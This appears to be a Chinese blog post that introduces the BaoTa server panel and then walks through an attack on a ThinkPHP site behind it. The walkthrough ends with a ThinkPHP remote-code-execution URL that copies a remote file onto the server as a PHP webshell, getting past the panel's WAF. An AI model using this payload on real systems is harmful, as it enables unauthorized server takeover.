宝塔简介宝塔面板是一款使用方便、功能强大、交互友好且终身免费的服务器管理软件。 集成一键配置:LAMP/LNMP/Tomcat/Node.js、网站、数据库、FTP、SSL,一键部署源码,通过Web端轻松管理服务器。 2分钟安装好面板,一键管理服务器。 服务器安装了宝塔面板可以在上面搭建网站,其实和云帮手,护卫神、WDCP都感觉差不多吧,都是作为这几年比较流行的面板,很多站长基本第一次操作linux面板就是这个。 服务器大多数是用windows系统或Linux系统,安装了Linux系统的服务器不是图形化界面,操作比较复杂,要输入命令,通过命令来执行操作,费时费力,但宝塔面板有Linux系统面板,可以安装LNMP、LAMP等环境,包括简单的备份、监控、定时计划,功能强大,用户使用反馈单机版的问题都有,但是没有针对新的SEO需求,做插件和功能调整。 测试过程
访问之,发现存在报错,并泄露相关CMS信息 尝试Thinkphp常规操作进行getshell 访问shell,发现phpinfo解析异常 通过信息搜集发现目标使用宝塔搭建的,怀疑是宝塔的waf过滤了尖括号 通过测试发现 通过 http://小生观察室/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=copy&vars[1][]=http://123./123.txt&vars[1][]=123.php |
|
|
